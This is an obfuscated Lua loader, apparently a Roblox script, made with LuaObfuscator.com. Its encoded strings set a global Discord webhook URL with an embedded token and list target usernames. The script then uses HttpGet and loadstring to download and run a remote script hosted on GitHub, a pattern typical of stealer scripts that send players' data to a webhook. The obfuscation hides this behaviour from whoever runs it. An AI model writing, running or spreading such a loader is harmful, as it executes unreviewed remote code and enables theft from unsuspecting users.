--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=v2(v0(v30,16));if v19 then local v92=0;local v93;while true do if (v92==0) then v93=v5(v82,v19);v19=nil;v92=1;end if (v92==1) then return v93;end end else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=(v31/((5 -3)^(v32-((119 -(32 + 85)) -(1 + 0)))))%((879 -(282 + 595))^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v83-(v83%(1638 -(1523 + 114))) ;else local v84=0 + 0 ;local v85;while true do if (v84==(931 -(857 + 17 + 57))) then v85=(1067 -((1025 -(892 + 65)) + 997))^(v32-(569 -(367 + 201))) ;return (((v31%(v85 + v85))>=v85) and (928 -(214 + 713))) or (0 -0) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (4 -2) );v18=v18 + (3 -1) ;return (v36 * 256) + v35 ;end local function v23()local v37=0 -0 ;local v38;local v39;local v40;local v41;while true do if (v37==(351 -(87 + 263))) then return (v41 * ((66681547 -49904151) -(67 + 113))) + (v40 * ((49008 -(802 + 150)) + 17480)) + (v39 * (628 -372)) + v38 ;end if (v37==0) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + 4 ;v37=2 -1 ;end end end local function v24()local v42=v23();local v43=v23();local v44=1 -0 ;local v45=(v20(v43,1 + 0 ,1017 -(915 + 82) ) * ((5 -3)^(19 + 13))) + v42 ;local v46=v20(v43,27 -6 ,1218 -(1069 + 118) );local v47=((v20(v43,(31 + 41) -40 )==(1 -0)) and  -((1 -0) + 0)) or (1 -0) ;if (v46==(0 + 0)) then if (v45==0) then return v47 * ((1229 -(145 + 293)) -(368 + 423)) ;else local v94=0;while true do if (0==v94) then v46=3 -2 ;v44=0;break;end end end elseif (v46==(2065 -((440 -(44 + 386)) + 8))) then return ((v45==0) and (v47 * ((3 -2)/0))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/((444 -(416 + 26))^(165 -113)))) ;end local function v25(v48)local v49;if  not v48 then local v86=1486 -((2136 -(116 + 1022)) + 488) ;while true do if (v86==0) then v48=v23();if (v48==(0 + 0)) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;local v50={};for v65=773 -(201 + 571) , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=1749 -(1013 + 736) ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v51==3) then v58=nil;while true do local v95=0;while true do if ((0 + 0)~=v95) then else if (v52==(4 -2)) then for v103=1,v23() do local v104=0;local v105;local v106;local v107;while true do if (v104==0) then v105=0;v106=nil;v104=1;end if ((3 -2)~=v104) then else v107=nil;while true do if (1~=v105) then else while true do if (v106==(867 -(550 + 317))) then v107=v21();if (v20(v107,1 -0 ,1 -0 )==(0 -0)) then local v168=0;local v169;local v170;local v171;local v172;local v173;while true do if (2==v168) then v173=nil;while true do if (v169==(286 -(134 + 151))) then local v176=0;while true do if (v176==(1665 -(970 + 695))) then v172=nil;v173=nil;v176=1 -0 ;end if (v176~=1) then else v169=2;break;end end end if ((1992 -(582 + 1408))==v169) then while true do if (v170~=1) then else local v179=0 -0 ;local v180;while true do if (v179~=0) then else v180=0 -0 ;while true do if (v180~=(0 -0)) then else local v189=0;while true do if (1==v189) then v180=1825 -(1195 + 629) ;break;end if (v189==(0 -0)) then local v191=241 -(187 + 54) ;while true do if (v191==0) then v173={v22(),v22(),nil,nil};if (v171==0) then local v197=0 + 0 ;local v198;local v199;while true do if (v197~=1) then else while true do if ((0 -0)==v198) then v199=0 -0 ;while true do if (v199==0) then v173[3]=v22();v173[4]=v22();break;end end break;end end break;end if (v197~=(0 + 0)) then else v198=0;v199=nil;v197=1;end end elseif (v171==(1637 -(1373 + 263))) then v173[1003 -(451 + 549) ]=v23();elseif (v171==2) then v173[3]=v23() -((1 + 1)^(24 -8)) ;elseif (v171==3) then local v202=0 -0 ;local v203;while true do if (v202==(1384 -(746 + 638))) then v203=0;while true do if (v203==(0 + 0)) then v173[3]=v23() -(2^16) ;v173[5 -1 ]=v22();break;end end break;end end end v191=1;end if (v191~=(342 -(218 + 123))) then else v189=1582 -(1535 + 46) ;break;end end end end end if (v180~=1) then else v170=2 + 0 ;break;end end break;end end end if (v170~=(1 + 2)) then else if (v20(v172,3,563 -(306 + 254) )==1) then v173[4]=v58[v173[1 + 3 ]];end v53[v103]=v173;break;end if (v170==0) then local v182=0;local v183;local v184;while true do if ((0 -0)==v182) then v183=1467 -(899 + 568) ;v184=nil;v182=1;end if (v182==1) then while true do if (v183~=0) then else v184=0 + 0 ;while true do if (v184==1) then v170=1;break;end if (0~=v184) then else local v192=0 -0 ;while true do if (v192==1) then v184=604 -(268 + 335) ;break;end if (v192==(290 -(60 + 230))) then v171=v20(v107,574 -(426 + 146) ,3);v172=v20(v107,4,1 + 5 );v192=1457 -(282 + 1174) ;end end end end break;end end break;end end end if (v170==2) then local v185=811 -(569 + 242) ;local v186;while true do if (v185==0) then v186=0 -0 ;while true do if (v186==(0 + 0)) then local v190=1024 -(706 + 318) ;while true do if (v190==1) then v186=1252 -(721 + 530) ;break;end if (v190~=(1271 -(945 + 326))) then else if (v20(v172,1,2 -1 )~=1) then else v173[2 + 0 ]=v58[v173[2]];end if (v20(v172,702 -(271 + 429) ,2)~=(1 + 0)) then else v173[1503 -(1408 + 92) ]=v58[v173[3]];end v190=1;end end end if (v186==(1087 -(461 + 625))) then v170=3;break;end end break;end end end end break;end if (v169==(1288 -(993 + 295))) then local v177=0;local v178;while true do if (v177==(0 + 0)) then v178=1171 -(418 + 753) ;while true do if (v178~=(1 + 0)) then else v169=1 + 0 ;break;end if (v178==0) then v170=0;v171=nil;v178=1 + 0 ;end end break;end end end end break;end if ((1 + 0)==v168) then v171=nil;v172=nil;v168=531 -(406 + 123) ;end if (v168~=0) then else v169=1769 -(1749 + 20) ;v170=nil;v168=1 + 0 ;end end end break;end end break;end if (v105~=(1322 -(1249 + 73))) then else local v159=0;while true do if (v159~=1) then else v105=1;break;end if (v159~=0) then else v106=0 + 0 ;v107=nil;v159=1;end end end end break;end end end for v108=1146 -(466 + 679) ,v23() do v54[v108-(2 -1) ]=v28();end return v56;end if (v52==(2 -1)) then local v100=1900 -(106 + 1794) ;local v101;while true do if (v100~=(0 + 0)) then else v101=0 + 0 ;while true do if (v101~=1) then else for v160=1,v57 do local v161=0 -0 ;local v162;local v163;local v164;while true do if (v161==(0 -0)) then v162=114 -(4 + 110) ;v163=nil;v161=585 -(57 + 527) ;end if (v161~=1) then else v164=nil;while true do if (0==v162) then local v174=1427 -(41 + 1386) ;while true do if (v174==1) then v162=104 -(17 + 86) ;break;end if (v174==0) then v163=v21();v164=nil;v174=1 + 0 ;end end end if (v162~=(1 -0)) then else if (v163==1) then v164=v21()~=0 ;elseif (v163==2) then v164=v24();elseif (v163~=3) then else v164=v25();end v58[v160]=v164;break;end end break;end end end v56[8 -5 ]=v21();v101=168 -(122 + 44) ;end if (v101~=0) then else v57=v23();v58={};v101=1 -0 ;end if (v101==(6 -4)) then v52=2 + 0 ;break;end end break;end end end v95=1;end if (v95==(1 + 0)) then if (v52==(0 -0)) then local v102=65 -(30 + 35) ;while true do if (v102~=0) then else v53={};v54={};v102=1 + 0 ;end if (v102==2) then v52=1258 -(1043 + 214) ;break;end if (v102==1) then v55={};v56={v53,v54,nil,v55};v102=5 -3 ;end end end break;end end end break;end if (v51==2) then v56=nil;v57=nil;v51=583 -(361 + 219) ;end if (v51==(320 -(53 + 267))) then local v90=0 + 0 ;while true do if (v90==(413 -(15 + 398))) then v52=0;v53=nil;v90=1;end if (v90==1) then v51=983 -(18 + 964) ;break;end end end if ((3 -2)==v51) then local v91=0 + 0 ;while true do if (v91==1) then v51=2 + 0 ;break;end if (v91==(850 -(20 + 830))) then v54=nil;v55=nil;v91=1 + 0 ;end end end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v87=0,v75 do if (v87>=v69) then v73[v87-v69 ]=v74[v87 + 1 ];else v77[v87]=v74[v87 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=10) then if (v80<=4) then if (v80<=1) then if (v80==0) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end else v77[v79[2]]=v79[3];end elseif (v80<=2) then v77[v79[2]]=v79[3]~=0 ;elseif (v80>3) then local v130=v79[2];local v131=v77[v79[3]];v77[v130 + 1 ]=v131;v77[v130]=v131[v79[4]];else local v135=0;local v136;local v137;local v138;local v139;while true do if (v135==2) then for v165=v136,v72 do v139=v139 + 1 ;v77[v165]=v137[v139];end break;end if (v135==1) then v72=(v138 + v136) -1 ;v139=0;v135=2;end if (v135==0) then v136=v79[2];v137,v138=v70(v77[v136](v13(v77,v136 + 1 ,v79[3])));v135=1;end end end elseif (v80<=7) then if (v80<=5) then v77[v79[2]]();elseif (v80>6) then v77[v79[2]]=v79[3];else v77[v79[2]][v79[3]]=v79[4];end elseif (v80<=8) then do return;end elseif (v80>9) then v77[v79[2]]=v61[v79[3]];else v77[v79[2]][v79[3]]=v79[4];end elseif (v80<=15) then if (v80<=12) then if (v80>11) then v77[v79[2]]=v61[v79[3]];else local v115=v79[2];local v116,v117=v70(v77[v115](v13(v77,v115 + 1 ,v79[3])));v72=(v117 + v115) -1 ;local v118=0;for v127=v115,v72 do local v128=0;while true do if (v128==0) then v118=v118 + 1 ;v77[v127]=v116[v118];break;end end end end elseif (v80<=13) then local v119=v79[2];local v120=v77[v79[3]];v77[v119 + 1 ]=v120;v77[v119]=v120[v79[4]];elseif (v80==14) then v71=v79[3];else local v149=v79[2];v77[v149]=v77[v149](v13(v77,v149 + 1 ,v72));end elseif (v80<=18) then if (v80<=16) then v77[v79[2]]=v79[3]~=0 ;elseif (v80>17) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end else v71=v79[3];end elseif (v80<=19) then local v125=0;local v126;while true do if (v125==0) then v126=v79[2];v77[v126]=v77[v126](v13(v77,v126 + 1 ,v72));break;end end elseif (v80==20) then v77[v79[2]]();else do return;end end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0D3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31323130383338353839332O31372O3536342F386C2D6F534A356F365F7735734B38666957672O54554675444D5530795450365F4846706D5A443655517945664F7347672O3634544B745A75517946535A375052326D31030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D6503073O006970696E5F703403093O00557365724E616D653203073O006970696E5F703300173O0012013O00013O00264O000E000100020004113O000E000100120A000100033O00300600010004000500120A000100063O00120A000200073O00200D000200020008001201000400094O0010000500014O000B000200054O000F00013O00022O00050001000100010004113O0016000100264O0001000100010004113O0001000100120A000100033O0030060001000A000B00120A000100033O0030060001000C000D0012013O00023O0004113O000100012O00083O00017O00",v9(),...);end
